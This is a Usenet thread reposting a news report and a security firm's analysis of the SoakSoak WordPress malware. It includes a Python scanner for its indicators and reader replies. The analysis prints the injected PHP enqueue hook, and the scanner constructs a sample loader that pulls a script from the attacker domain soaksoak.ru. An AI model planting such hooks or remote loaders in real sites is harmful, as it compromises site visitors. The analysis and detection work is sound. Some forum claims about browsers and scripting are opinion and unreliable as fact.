Mysterious Russian Malware (SoakSoak) Is Infecting 100,000+ Wordpress Sites

Mysterious Russian Malware Is Infecting 100,000+ Wordpress Sites

December 15, 2014

A Russian malware called SoakSoak has infected over 100,000 Wordpress
sites since this Sunday, turning blogs into attack platforms. It's a
potential shitshow, and it could've been prevented earlier this fall.

Google has already blocked 11,000 domains to try to curb the damage.
According to security firm Sucuri, the malware uses a vulnerability in a
slideshow plug-in called Slider Revolution. The Slider Revolution team
has known about the vulnerability since September, but it looks like
they failed to fix it before the security hole got crammed with steaming
hot malware.

Researchers at Sucuri are warning that it'll be hard to completely
eradicate the malware as long as so many site owners don't know it's
there. In addition to removing the malicious code, they will need to
update the premium plug-in. If the plug-in came as part of a theme, it
won't update automatically, which means site admins will have to
manually update.

Gaming site Dulfy was one of the first infected domains to fix the problem
by removing code and going behind a firewall, but it may persist on
blogs with less diligent administrators indefinitely. And Dulfy's admin
isn't sure the fix is permanent. "The firewall will be a temporary
measure until we can figure out what is doing it," site owner Kristina
Hunter told me.

http://gizmodo.com/mysterious-russian-malware-is-infecting-over-100-000-wo-1671419522

See also:

http://blog.sucuri.net/2014/12/soaksoak-malware-compromises-100000-wordpress-websites.html

===============
The impact seems to be affecting most hosts across the WordPress hosting
spectrum. Quick breakdown of the decoding process is available via our
PHP Decoder.
SoakSoak Malware Anatomy

It is modifying the file wp-includes/template-loader.php and including
this content:

<?php
// Hook injected into wp-includes/template-loader.php: on every page load it
// enqueues the (trojanised) core swfobject.js through the normal WordPress API.
function FuncQueueObject()
{
  wp_enqueue_script("swfobject");
}
add_action("wp_enqueue_scripts", 'FuncQueueObject');

This causes the wp-includes/js/swfobject.js to be loaded on every page
you view on the site which includes the malware here:

eval(decodeURIComponent("<big long alphanumeric string>"));

This malware, when decoded, loads JavaScript malware from the
soaksoak.ru domain, specifically this file:
hxxp://soaksoak.ru/xteas/code

(note:  As of this writing, soaksoak.ru does not resolve)
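The injection pattern quoted above lends itself to a simple offline check. The following is an added example, not code from the Gizmodo article, from Sucuri's post, or from WordPress itself: it looks for the FuncQueueObject hook in template-loader.php, pulls every eval(decodeURIComponent("...")) wrapper out of swfobject.js, percent-decodes it and lists the URLs the decoded body references. The sample file contents, including the decoded second-stage body, are constructed for the example; the real encoded blob is not reproduced on this page, so the stand-in only reproduces the loader behaviour the post describes.

```python
"""Added example (not from the Gizmodo or Sucuri posts): offline IOC scan for
the SoakSoak injection pattern described above. All sample file contents below
are constructed for this example."""
import re
import urllib.parse

# Indicators taken from the post: the injected hook in template-loader.php and
# the eval(decodeURIComponent(...)) wrapper in wp-includes/js/swfobject.js.
INJECTED_HOOK_RE = re.compile(
    r'add_action\(\s*["\']wp_enqueue_scripts["\']\s*,\s*["\']FuncQueueObject["\']\s*\)'
)
ENQUEUE_RE = re.compile(r'wp_enqueue_script\(\s*["\']swfobject["\']\s*\)')
EVAL_DECODE_RE = re.compile(
    r'eval\s*\(\s*decodeURIComponent\s*\(\s*["\']([^"\']+)["\']\s*\)\s*\)'
)
URL_RE = re.compile(r'https?://[^\s"\'<>)]+')


def template_loader_is_injected(php_source: str) -> bool:
    """True when template-loader.php carries the SoakSoak enqueue hook."""
    return bool(INJECTED_HOOK_RE.search(php_source) and ENQUEUE_RE.search(php_source))


def decode_eval_payloads(js_source: str) -> list:
    """Decoded bodies of every eval(decodeURIComponent("...")) wrapper in a JS file."""
    return [urllib.parse.unquote(m) for m in EVAL_DECODE_RE.findall(js_source)]


def remote_loaders(js_source: str) -> list:
    """URLs referenced inside the decoded payloads (second-stage script locations)."""
    urls = []
    for body in decode_eval_payloads(js_source):
        urls.extend(URL_RE.findall(body))
    return urls


def scan_site(files: dict) -> dict:
    """files maps WordPress-relative paths to contents; returns findings per path."""
    findings = {}
    loader = files.get("wp-includes/template-loader.php", "")
    if template_loader_is_injected(loader):
        findings["wp-includes/template-loader.php"] = "injected wp_enqueue_scripts hook"
    swf = files.get("wp-includes/js/swfobject.js", "")
    urls = remote_loaders(swf)
    if urls:
        findings["wp-includes/js/swfobject.js"] = (
            "eval(decodeURIComponent) loader -> " + ", ".join(urls)
        )
    return findings


# Constructed sample of an infected install, modelled on the post. The decoded
# second-stage body is a stand-in, not the real payload.
CLEAN_LOADER = "<?php\n/* Loads the correct template */\n"
INFECTED_LOADER = CLEAN_LOADER + (
    'function FuncQueueObject()\n{\n  wp_enqueue_script("swfobject");\n}\n'
    'add_action("wp_enqueue_scripts", \'FuncQueueObject\');\n'
)
STAGE2 = ('var s=document.createElement("script");'
          's.src="http://soaksoak.ru/xteas/code";document.head.appendChild(s);')
INFECTED_SWFOBJECT = 'eval(decodeURIComponent("%s"));\n/* SWFObject v2.2 ... */' % (
    urllib.parse.quote(STAGE2, safe="")
)

SAMPLE_SITE = {
    "wp-includes/template-loader.php": INFECTED_LOADER,
    "wp-includes/js/swfobject.js": INFECTED_SWFOBJECT,
}

if __name__ == "__main__":
    for path, finding in scan_site(SAMPLE_SITE).items():
        print(path, "->", finding)
```

Run it against a real install by reading the two files from the document root into the dictionary. A theme that legitimately enqueues swfobject will not trip the check on its own, since both the hook in a core file and the enqueue call are required; the decisive signal is any eval of a decoded string in a core JavaScript file, and diffing core files against a pristine copy of the same WordPress version catches modifications these two patterns do not. As the Sucuri post notes, removing the code without updating the Slider Revolution plug-in only invites reinfection.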

Re: Mysterious Russian Malware (SoakSoak) Is Infecting 100,000+ Wordpress Sites


    I have not used Wordpress for ages now, due to its mandatory
scripting. Any site that thinks that datamining is more important than
users' safety is not worth visiting, IMHO.
    So ... not a problem for me.
    []'s
--  
Don't be evil - Google 2004
We have a new policy  - Google 2012

Re: Mysterious Russian Malware (SoakSoak) Is Infecting 100,000+ Wordpress Sites

On Tuesday, December 16, 2014 11:59:00 PM UTC+8, Shadow wrote:

How can this affect a reader of WordPress?  A user I can see, but a reader, with an updated browser, has nothing to fear?

RL

Re: Mysterious Russian Malware (SoakSoak) Is Infecting 100,000+ Wordpress Sites

On Tue, 16 Dec 2014 08:59:12 -0800 (PST), RayLopez99 wrote:

    "Updated browser" just means "updated backdoors". Apparently
you have to enable scripts that download browser helpers to read the
docs. The browser helpers are malware. If you block scripts, you
cannot read Wordpress pages. Try blocking it with NoScript and see.
    []'s
--  
Don't be evil - Google 2004
We have a new policy  - Google 2012

Re: Mysterious Russian Malware (SoakSoak) Is Infecting 100,000+ Wordpress Sites

On Wednesday, December 17, 2014 3:36:39 AM UTC+8, Shadow wrote:
  
I see, it makes sense.  Indeed I tried blocking a popular Wordpress site with AdBlock, and indeed it did not work right.

RL
